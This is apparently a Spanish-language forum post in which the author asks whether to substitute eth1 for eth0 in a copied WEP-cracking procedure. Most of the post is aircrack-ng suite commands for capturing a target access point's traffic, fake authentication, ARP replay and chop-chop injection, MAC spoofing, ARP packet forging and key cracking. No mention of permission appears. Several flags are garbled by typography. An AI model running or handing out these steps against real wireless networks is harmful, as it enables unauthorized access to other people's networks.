Hola, tengo una duda en cuanto a la interfaz.
Mi tarjeta wireless está asociada a la eth1 y no a la eth0, ¿esto como lo puedo cambiar?
¿Bastaría con sustituir eth0 por eth1 en los siguientes pasos?
Los 5 primeros pasos serian comunes para las opciones 1 y 2
1º) ifconfig eth0 up
2º) airodump eth0 pruebas 0 1
Veo las conexiones y apunto los datos del objetivo, como BSSID , ESSID y el canal.
Una vez apuntado los datos necesarios del ap, del cliente , etc, cerramos el proceso con CONTROL+Z
3º ) iwconfig “interface” rate 1M
limitamos el rate de nuestra tarjeta a 1 Mb por segundo.
En interface ponemos rtap0 para ipw2200.
Hay veces que no se podra.
4º) iwconfig eth0 essid "ap_objetivo" key 1234567890123 channel “canal”
Este seria el ataque 1.
Me vinculo al ap con una key falsa
“ap objetivo”--> nombre de la conexión objetivo “paco”, “WLAN”, etc…
“canal”--> indicar el canal
Puede haber veces que no nos deje.
5º) airodump-ng -c canal -b bssid -w archivo rtap0
Lo ejecuto en otra ventana y empiezo a capturar datos indicando el canal y la mac del objetivo
"canal"--> se sustituye por el canal
"Bssid"-->se sustituye por la mac del objetivo
Archivo --> nombre del archivo donde se guardan las capturas de datos
OPCION 1: CON CLIENTE CONECTADO (ataque 3)
6º) aireplay-ng --ipwsys -3 -x 1024 -g 1000000 -b bssid -h cliente -i rtap0 eth0
Inyecto trafico con el metodo de rh3nt0n. Con un cliente conectado.
Este no se muy bien lo que hace, si captura paquetes del cliente y los manda al ap.
Bssid-->se sustituye por la mac del objetivo
Cliente--> se sustituye por la mac del cliente conectado a la web
OPCION 2:SIN CLIENTE CONECTADO (ataque 2)
cliente falso
6º) aireplay-ng - - ipwsys -2 –t 1 –b bssid –c FF:FF:FF:FF:FF:FF –i rtap0 eth0
Se agradeceria algo de información.
ATAQUE CHOP CHOP: sin cliente conectado
--> ifconfig eth0 up hw ether 00:11:22:33:44:55
Con esto activamos la tarjeta y cambiamos la mac a 00:11:22:33:44:55
--> iwconfig eth0 essid “nombre del AP ” channel “canal” key 12345
Asi nos ponemos el nombre del AP y una clave cualquiera
--> airodump-ng - - ivs - - bssid “mac del AP” –w ataquechop rtap0
Comenzamos la captura indicando la mac del ap , capturando con rtap0 y guardando las capturas en el fichero ataquechop. Supongo que no hace falta poner la extension al indicar "- - ivs"
En otra ventana ponemos:
--> aireplay-ng –ipwsys -4 –a “mac AP” –h 11:22:33:44:55 –i rtap0 eth0
Cuando pregunte ¿use this packet ? le decimos Y. Cuando termine copiamos el nombre del archivo “replay_dec…..xor” para usarlo en el siguiente comando y forjar el ARP que reinyectaremos después.
--> arpforge-ng “replay_dec…..xor” 1 “mac del AP” 11:22:33:44:55 192.168.1.20 192.168.1.21 ficheroarp.cap
De esta forma usamos el fichero xor anterior para hacer el ARP que se reinyectara para aumentar los paquetes.
“1” es el valor de FROMDS
--> aireplay-ng - - ipwsys -2 –r ficheroarp.cap eth0
Cuando pregunte ¿use this packet ? le decimos Y
--> aircrack–ng –n 64 ataquechop*.ivs
Probamos con -n 64 por si la clave es de 64 bits.
Agradezco vuestra ayuda.
P.D.: Esperando impaciente wifislax 2.0 ..........................
Autor